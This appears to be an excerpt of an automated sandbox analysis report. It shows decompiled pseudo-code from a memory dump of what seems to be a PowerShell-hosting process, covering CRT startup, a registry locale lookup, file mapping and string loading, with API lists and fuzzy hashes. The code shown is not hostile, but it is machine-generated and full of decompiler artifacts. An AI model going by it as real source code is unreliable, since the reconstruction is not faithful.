                                                                                                                                                                                                                              0x0125e630
                                                                                                                                                                                                                              0x0125e632
                                                                                                                                                                                                                              0x0125e648
                                                                                                                                                                                                                              0x0125e65b
                                                                                                                                                                                                                              0x0125e661
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125e661
                                                                                                                                                                                                                              0x0125e5e1
                                                                                                                                                                                                                              0x0125e5e1
                                                                                                                                                                                                                              0x0125e5e6
                                                                                                                                                                                                                              0x0125e5e9
                                                                                                                                                                                                                              0x0125e5ea
                                                                                                                                                                                                                              0x0125e5ed
                                                                                                                                                                                                                              0x0125e5f6
                                                                                                                                                                                                                              0x0125e5f6

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?), ref: 0125E648
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%windir%\System32\WindowsPowerShell\v1.0\,?,00000104), ref: 0125E65B
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125E677
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$H_prolog3_
                                                                                                                                                                                                                              • String ID: %windir%\System32\WindowsPowerShell\v1.0\$.dll$.ni.dll$\
                                                                                                                                                                                                                              • API String ID: 1292458247-3266281645
                                                                                                                                                                                                                              • Opcode ID: 4ba26ad2d69c28476f42dd561af0d672ec0edeaffa52dccbddb3c2eb2b47becb
                                                                                                                                                                                                                              • Instruction ID: ea378cdd83f65ddb61ad6330b0035ada8b6ba1ffc5232385ddd8b5f2439a5b33
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ba26ad2d69c28476f42dd561af0d672ec0edeaffa52dccbddb3c2eb2b47becb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 845184B5A11215ABCF54EFA4DC98AFEB778EF58310F018559ED16E7290DB306E04CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125972E, Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                                                              			E0125972E(int _a4) {
				char _v16;
				signed int _t13;
				signed int _t17;
				intOrPtr* _t20;
				intOrPtr* _t21;
				void* _t22;
				signed int _t25;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t33;

				while(1) {
					_t13 = malloc(_a4);
					if(_t13 != 0) {
						break;
					}
					_push(_a4);
					L01259E26();
					__eflags = _t13;
					if(_t13 == 0) {
						E01259700( &_v16);
						_push(0x125f5a8);
						_push( &_v16);
						L01259E2C();
						asm("int3");
						asm("int3");
						asm("int3");
						__eflags =  *0x1250000 - 0x5a4d; // 0x5a4d
						if(__eflags == 0) {
							_t29 =  *0x125003c; // 0x100
							__eflags =  *((intOrPtr*)(_t29 + 0x1250000)) - 0x4550;
							if( *((intOrPtr*)(_t29 + 0x1250000)) != 0x4550) {
								goto L5;
							} else {
								_t6 = _t29 + 0x1250018; // 0xc0e010b
								_t25 =  *_t6 & 0x0000ffff;
								__eflags = _t25 - 0x10b;
								if(_t25 == 0x10b) {
									_t17 = 0;
									__eflags =  *((intOrPtr*)(_t29 + 0x1250074)) - 0xe;
									if( *((intOrPtr*)(_t29 + 0x1250074)) > 0xe) {
										__eflags =  *(_t29 + 0x12500e8);
										goto L13;
									}
								} else {
									__eflags = _t25 - 0x20b;
									if(_t25 != 0x20b) {
										goto L5;
									} else {
										_t17 = 0;
										__eflags =  *((intOrPtr*)(_t29 + 0x1250084)) - 0xe;
										if( *((intOrPtr*)(_t29 + 0x1250084)) > 0xe) {
											__eflags =  *(_t29 + 0x12500f8);
											L13:
											_t12 = __eflags != 0;
											__eflags = _t12;
											_t17 = _t17 & 0xffffff00 | _t12;
										}
									}
								}
							}
						} else {
							L5:
							_t17 = 0;
						}
						 *0x1260378 = _t17;
						__set_app_type(E01259F0E(1));
						 *0x12606c0 =  *0x12606c0 | 0xffffffff;
						 *0x12606c4 =  *0x12606c4 | 0xffffffff;
						_t20 = __p__fmode();
						_t32 =  *0x12606b0; // 0x0
						 *_t20 = _t32;
						_t21 = __p__commode();
						_t33 =  *0x12606a4; // 0x0
						 *_t21 = _t33;
						_t22 = E0125A130();
						__eflags =  *0x1260354;
						if( *0x1260354 == 0) {
							__setusermatherr(E0125A130);
						}
						E0125A133(_t22);
						__eflags = 0;
						return 0;
					} else {
						continue;
					}
					L17:
				}
				return _t13;
				goto L17;
			}













                                                                                                                                                                                                                              0x01259745
                                                                                                                                                                                                                              0x01259748
                                                                                                                                                                                                                              0x01259751
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259738
                                                                                                                                                                                                                              0x0125973b
                                                                                                                                                                                                                              0x01259741
                                                                                                                                                                                                                              0x01259743
                                                                                                                                                                                                                              0x0125975a
                                                                                                                                                                                                                              0x0125975f
                                                                                                                                                                                                                              0x01259767
                                                                                                                                                                                                                              0x01259768
                                                                                                                                                                                                                              0x0125976d
                                                                                                                                                                                                                              0x0125976e
                                                                                                                                                                                                                              0x0125976f
                                                                                                                                                                                                                              0x01259775
                                                                                                                                                                                                                              0x0125977c
                                                                                                                                                                                                                              0x01259782
                                                                                                                                                                                                                              0x01259788
                                                                                                                                                                                                                              0x01259792
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259794
                                                                                                                                                                                                                              0x01259794
                                                                                                                                                                                                                              0x01259794
                                                                                                                                                                                                                              0x0125979b
                                                                                                                                                                                                                              0x012597a0
                                                                                                                                                                                                                              0x012597bc
                                                                                                                                                                                                                              0x012597be
                                                                                                                                                                                                                              0x012597c5
                                                                                                                                                                                                                              0x012597c7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012597c7
                                                                                                                                                                                                                              0x012597a2
                                                                                                                                                                                                                              0x012597a2
                                                                                                                                                                                                                              0x012597a7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012597a9
                                                                                                                                                                                                                              0x012597a9
                                                                                                                                                                                                                              0x012597ab
                                                                                                                                                                                                                              0x012597b2
                                                                                                                                                                                                                              0x012597b4
                                                                                                                                                                                                                              0x012597cd
                                                                                                                                                                                                                              0x012597cd
                                                                                                                                                                                                                              0x012597cd
                                                                                                                                                                                                                              0x012597cd
                                                                                                                                                                                                                              0x012597cd
                                                                                                                                                                                                                              0x012597b2
                                                                                                                                                                                                                              0x012597a7
                                                                                                                                                                                                                              0x012597a0
                                                                                                                                                                                                                              0x0125977e
                                                                                                                                                                                                                              0x0125977e
                                                                                                                                                                                                                              0x0125977e
                                                                                                                                                                                                                              0x0125977e
                                                                                                                                                                                                                              0x012597d2
                                                                                                                                                                                                                              0x012597dd
                                                                                                                                                                                                                              0x012597e3
                                                                                                                                                                                                                              0x012597ea
                                                                                                                                                                                                                              0x012597f3
                                                                                                                                                                                                                              0x012597f9
                                                                                                                                                                                                                              0x012597ff
                                                                                                                                                                                                                              0x01259801
                                                                                                                                                                                                                              0x01259807
                                                                                                                                                                                                                              0x0125980d
                                                                                                                                                                                                                              0x0125980f
                                                                                                                                                                                                                              0x01259814
                                                                                                                                                                                                                              0x0125981b
                                                                                                                                                                                                                              0x01259822
                                                                                                                                                                                                                              0x01259828
                                                                                                                                                                                                                              0x01259829
                                                                                                                                                                                                                              0x0125982e
                                                                                                                                                                                                                              0x01259830
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259743
                                                                                                                                                                                                                              0x01259756
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _callnewh.MSVCRT ref: 0125973B
                                                                                                                                                                                                                                • Part of subcall function 01259700: ??0exception@@QAE@XZ.MSVCRT ref: 01259705
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 01259748
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(0125F5A8,0125F5A8), ref: 01259768
                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 012597DD
                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 012597F3
                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 01259801
                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 01259822
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??0exception@@ExceptionThrow__p__commode__p__fmode__set_app_type__setusermatherr_callnewhmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2766816358-0
                                                                                                                                                                                                                              • Opcode ID: b061a9eb99ad432d7330315137b4a3597d435a4fd6dc8d712830b6eb041cafaa
                                                                                                                                                                                                                              • Instruction ID: c5efc6eb51520a4074bae33b423a5645e5f26886774cadfdf6d18a7f669ac518
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b061a9eb99ad432d7330315137b4a3597d435a4fd6dc8d712830b6eb041cafaa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7921A174820206CFDFB85F38F8CD5353B60AB40329F20866AEE15865E4EB7699D1DB04
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D170, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                                                                              			E0125D170() {
				signed int _v8;
				char _v16;
				void* _v20;
				int _v24;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t17;
				long _t23;
				char* _t25;
				void* _t27;
				void* _t30;
				void* _t31;
				signed int _t32;
				void* _t33;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t14 =  *0x1260358; // 0xc21f7063
				_v8 = _t14 ^ _t35;
				_t37 = 0 -  *0x12608f8; // 0x0
				if(_t37 == 0) {
					_push(_t31);
					_v24 = 6;
					_t32 = 0;
					if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}", 0, 1,  &_v20) == 0) {
						_t23 = RegQueryValueExW(_v20, L"Locale", 0, 0,  &_v16,  &_v24);
						RegCloseKey(_v20);
						_t33 = _t33;
						if(_t23 == 0) {
							while(1) {
								_t25 =  &_v16;
								__imp___wcsnicmp(_t25,  *((intOrPtr*)(0x1251270 + _t32 * 8)), 3);
								_t36 = _t36 + 0xc;
								if(_t25 == 0) {
									break;
								}
								_t32 = _t32 + 1;
								if(_t32 < 0x1c) {
									continue;
								} else {
								}
								goto L7;
							}
							 *0x12608f8 =  *((intOrPtr*)(0x1251274 + _t32 * 8));
						}
					}
					L7:
					_pop(_t31);
				}
				_t17 =  *0x12608f8; // 0x0
				return E01259A40(_t17, _t27, _v8 ^ _t35, _t30, _t31, _t33);
			}





















                                                                                                                                                                                                                              0x0125d178
                                                                                                                                                                                                                              0x0125d17f
                                                                                                                                                                                                                              0x0125d184
                                                                                                                                                                                                                              0x0125d18b
                                                                                                                                                                                                                              0x0125d18d
                                                                                                                                                                                                                              0x0125d191
                                                                                                                                                                                                                              0x0125d19b
                                                                                                                                                                                                                              0x0125d1b0
                                                                                                                                                                                                                              0x0125d1c5
                                                                                                                                                                                                                              0x0125d1d0
                                                                                                                                                                                                                              0x0125d1d8
                                                                                                                                                                                                                              0x0125d1d9
                                                                                                                                                                                                                              0x0125d1db
                                                                                                                                                                                                                              0x0125d1e4
                                                                                                                                                                                                                              0x0125d1e8
                                                                                                                                                                                                                              0x0125d1ee
                                                                                                                                                                                                                              0x0125d1f3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d1f5
                                                                                                                                                                                                                              0x0125d1f9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d1fb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d1f9
                                                                                                                                                                                                                              0x0125d205
                                                                                                                                                                                                                              0x0125d205
                                                                                                                                                                                                                              0x0125d1d9
                                                                                                                                                                                                                              0x0125d20b
                                                                                                                                                                                                                              0x0125d20b
                                                                                                                                                                                                                              0x0125d20b
                                                                                                                                                                                                                              0x0125d20f
                                                                                                                                                                                                                              0x0125d21f

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,0125D9E1,?), ref: 0125D1A8
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(0125D9E1,Locale,00000000,00000000,?,00000006,00000000), ref: 0125D1C5
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(0125D9E1), ref: 0125D1D0
                                                                                                                                                                                                                              • _wcsnicmp.MSVCRT ref: 0125D1E8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 0125D19E
                                                                                                                                                                                                                              • Locale, xrefs: 0125D1BD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue_wcsnicmp
                                                                                                                                                                                                                              • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                                                                                                                                                                                              • API String ID: 2262609651-1161606707
                                                                                                                                                                                                                              • Opcode ID: f43d4bab843282c08e75713027d99e412e6bf4e9acb449749912c3c8fc26d1de
                                                                                                                                                                                                                              • Instruction ID: 600bdf055e9e05f788e7395a2db29b9fd0447ba7fdb393f9258807ed036d72ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f43d4bab843282c08e75713027d99e412e6bf4e9acb449749912c3c8fc26d1de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D211EF75A2024AA7CF719BA5AC8CEBF77B8FB81781F004015FD12E2199D6309950D7A4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125D4C4, Relevance: 9.1, APIs: 6, Instructions: 62fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E0125D4C4(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				void* _t17;
				void* _t18;
				signed int _t19;

				if(__ecx != 0) {
					if(__edx == 0) {
						return LoadLibraryExW(__ecx, 0, 0 | _a4 != 0x00000000);
					}
					_t18 = CreateFileW(__ecx, 0x80000000, 5, 0, 3, 0, 0);
					if(_t18 == 0xffffffff) {
						goto L1;
					}
					_t17 = CreateFileMappingW(_t18, 0, 8, 0, 0, 0);
					CloseHandle(_t18);
					if(_t17 == 0) {
						goto L1;
					}
					_t19 = MapViewOfFile(_t17, 1, 0, 0, 0);
					CloseHandle(_t17);
					if(_t19 == 0) {
						goto L1;
					}
					return _t19 | 0x00000001;
				}
				L1:
				return 0;
			}






                                                                                                                                                                                                                              0x0125d4ce
                                                                                                                                                                                                                              0x0125d4d6
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d53a
                                                                                                                                                                                                                              0x0125d4ed
                                                                                                                                                                                                                              0x0125d4f2
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d502
                                                                                                                                                                                                                              0x0125d504
                                                                                                                                                                                                                              0x0125d50c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d51b
                                                                                                                                                                                                                              0x0125d51d
                                                                                                                                                                                                                              0x0125d525
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d52a
                                                                                                                                                                                                                              0x0125d4d0
                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4E7
                                                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4FB
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D504
                                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D514
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D51D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$MappingView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1095920306-0
                                                                                                                                                                                                                              • Opcode ID: 42eb5e87668cbbc9e412991cfc56681d3ff896038f6afddee05172ae8fe5679c
                                                                                                                                                                                                                              • Instruction ID: bc36f1e848152bb40f43954dde019ba6eb73a40f5f85cd2f30348ac141e8887f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42eb5e87668cbbc9e412991cfc56681d3ff896038f6afddee05172ae8fe5679c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301B1B2620219BFF77026B96CCCF77695CDB84AADF148124FF01E20C4E571AC5042B0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125CDCC, Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                                                              			E0125CDCC(int __ecx, void** __edx) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _t5;
				signed short _t6;
				void** _t13;
				void* _t20;
				signed short _t23;

				_push(__ecx);
				_push(__ecx);
				_t23 = 0;
				_v8 = __ecx;
				_t13 = __edx;
				_t5 = GetModuleHandleW(0);
				_v12 = _t5;
				if(_t5 == 0) {
					_t6 = GetLastError();
					if(_t6 > 0) {
						_t6 = _t6 & 0x0000ffff | 0x80070000;
					}
					L10:
					return _t6;
				}
				_t20 = malloc(0xca);
				if(_t20 == 0) {
					L5:
					_t23 = GetLastError();
					if(_t23 > 0) {
						_t23 = _t23 & 0x0000ffff | 0x80070000;
					}
					L7:
					_t6 = _t23;
					goto L10;
				}
				if(LoadStringW(_v12, _v8, _t20, 0x64) - 1 > 0x62) {
					free(_t20);
					goto L5;
				} else {
					 *_t13 = _t20;
					goto L7;
				}
			}










                                                                                                                                                                                                                              0x0125cdd1
                                                                                                                                                                                                                              0x0125cdd2
                                                                                                                                                                                                                              0x0125cdd5
                                                                                                                                                                                                                              0x0125cdd7
                                                                                                                                                                                                                              0x0125cddb
                                                                                                                                                                                                                              0x0125cddd
                                                                                                                                                                                                                              0x0125cde3
                                                                                                                                                                                                                              0x0125cde8
                                                                                                                                                                                                                              0x0125ce38
                                                                                                                                                                                                                              0x0125ce40
                                                                                                                                                                                                                              0x0125ce45
                                                                                                                                                                                                                              0x0125ce45
                                                                                                                                                                                                                              0x0125ce4a
                                                                                                                                                                                                                              0x0125ce4f
                                                                                                                                                                                                                              0x0125ce4f
                                                                                                                                                                                                                              0x0125cdf6
                                                                                                                                                                                                                              0x0125cdfb
                                                                                                                                                                                                                              0x0125ce1e
                                                                                                                                                                                                                              0x0125ce24
                                                                                                                                                                                                                              0x0125ce28
                                                                                                                                                                                                                              0x0125ce2d
                                                                                                                                                                                                                              0x0125ce2d
                                                                                                                                                                                                                              0x0125ce33
                                                                                                                                                                                                                              0x0125ce33
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ce35
                                                                                                                                                                                                                              0x0125ce10
                                                                                                                                                                                                                              0x0125ce17
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ce12
                                                                                                                                                                                                                              0x0125ce12
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ce12

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000076,00000076,?,0125BF30), ref: 0125CDDD
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 0125CDF0
                                                                                                                                                                                                                              • LoadStringW.USER32(0125BF30,?,00000000,00000064), ref: 0125CE06
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125CE17
                                                                                                                                                                                                                              • GetLastError.KERNEL32(0125BF30), ref: 0125CE1E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0125BF30), ref: 0125CE38
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$HandleLoadModuleStringfreemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2048582471-0
                                                                                                                                                                                                                              • Opcode ID: 69131a193b6ea677ddeb3755406ddc4407a48096967cb4b128d1f6ad363e19fc
                                                                                                                                                                                                                              • Instruction ID: b5f6e747ea750718e10b2c2e09f7c697d3ddd66851df5fbded2c603d1dc2f219
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69131a193b6ea677ddeb3755406ddc4407a48096967cb4b128d1f6ad363e19fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97014C32620325EBD7301B9DE88DA6B7A7CEB85661B10415AFD01D7280EA71EC30A7E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0125F01B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                                                              			E0125F01B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v4;
				intOrPtr* _v8;
				char _v44;
				char _v84;
				char _v112;
				char _v152;
				signed int _t37;
				intOrPtr _t39;
				signed int _t40;
				char* _t54;
				intOrPtr* _t60;
				signed char _t65;
				intOrPtr* _t66;
				intOrPtr _t71;
				signed int _t74;
				signed char _t77;
				signed int _t89;

				_t76 = __esi;
				_t73 = __edi;
				_t59 = __ebx;
				_push(0x8c);
				E0125A5F0(E0125AB59, __ebx, __edi, __esi);
				_t37 = _a8 & 0x00000017;
				 *(__ecx + 8) = _t37;
				_t65 =  *(__ecx + 0xc) & _t37;
				if(_t65 == 0) {
					return E0125A59F(__ebx, __edi, __esi);
				} else {
					if(_a12 != 0) {
						_push(0);
						_push(0);
					} else {
						if((_t65 & 0x00000004) == 0) {
							__eflags = _t65 & 0x00000002;
							if((_t65 & 0x00000002) == 0) {
								E0125E172(__ebx,  &_v112, "ios_base::eofbit set");
								_v4 = 2;
								_push( &_v112);
								_t65 =  &_v152;
								E0125E223(__ebx, _t65, __edi, __esi, __eflags);
								_push(0x125f600);
								_t54 =  &_v152;
								goto L5;
							} else {
								E0125E172(__ebx,  &_v44, "ios_base::failbit set");
								_v4 = 1;
								goto L4;
							}
							L23:
							return _t77;
							goto L24;
						} else {
							E0125E172(__ebx,  &_v44, "ios_base::badbit set");
							_t8 =  &_v4;
							 *_t8 = _v4 & 0x00000000;
							_t89 =  *_t8;
							L4:
							_push( &_v44);
							_t65 =  &_v84;
							E0125E223(_t59, _t65, _t73, _t76, _t89);
							_push(0x125f600);
							_t54 =  &_v84;
						}
						L5:
						_push(_t54);
					}
					L01259E2C();
					asm("int3");
					_push(_t65);
					_push(_t59);
					_t60 = _v8;
					_push(_t76);
					_t77 = _t65;
					_push(_t73);
					_t39 =  *((intOrPtr*)(_t77 + 0x14));
					if(_t39 < _t60) {
						E0125A512();
						_t39 =  *((intOrPtr*)(_t77 + 0x14));
					}
					_t74 = _a8;
					_t40 = _t39 - _t60;
					if(_t40 < _t74) {
						_t74 = _t40;
					}
					if(_t74 != 0) {
						_t71 =  *((intOrPtr*)(_t77 + 0x18));
						_t66 = _t77 + 4;
						if(_t71 < 0x10) {
							_v8 = _t66;
						} else {
							_v8 =  *_t66;
							_t60 = _a4;
						}
						if(_t71 >= 0x10) {
							_t66 =  *_t66;
						}
						__imp__memmove_s(_t66 + _t60, _t71 - _t60, _v8 + _t60 + _t74, _t40 - _t74);
						E0125EABA(_t77,  *((intOrPtr*)(_t77 + 0x14)) - _t74);
					}
					goto L23;
				}
				L24:
			}




















                                                                                                                                                                                                                              0x0125f01b
                                                                                                                                                                                                                              0x0125f01b
                                                                                                                                                                                                                              0x0125f01b
                                                                                                                                                                                                                              0x0125f01b
                                                                                                                                                                                                                              0x0125f025
                                                                                                                                                                                                                              0x0125f02d
                                                                                                                                                                                                                              0x0125f030
                                                                                                                                                                                                                              0x0125f036
                                                                                                                                                                                                                              0x0125f038
                                                                                                                                                                                                                              0x0125f0c5
                                                                                                                                                                                                                              0x0125f03e
                                                                                                                                                                                                                              0x0125f042
                                                                                                                                                                                                                              0x0125f0c8
                                                                                                                                                                                                                              0x0125f0ca
                                                                                                                                                                                                                              0x0125f048
                                                                                                                                                                                                                              0x0125f04b
                                                                                                                                                                                                                              0x0125f075
                                                                                                                                                                                                                              0x0125f078
                                                                                                                                                                                                                              0x0125f098
                                                                                                                                                                                                                              0x0125f0a0
                                                                                                                                                                                                                              0x0125f0a7
                                                                                                                                                                                                                              0x0125f0a8
                                                                                                                                                                                                                              0x0125f0ae
                                                                                                                                                                                                                              0x0125f0b3
                                                                                                                                                                                                                              0x0125f0b8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125f07a
                                                                                                                                                                                                                              0x0125f082
                                                                                                                                                                                                                              0x0125f087
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125f087
                                                                                                                                                                                                                              0x0125f145
                                                                                                                                                                                                                              0x0125f14d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125f04d
                                                                                                                                                                                                                              0x0125f055
                                                                                                                                                                                                                              0x0125f05a
                                                                                                                                                                                                                              0x0125f05a
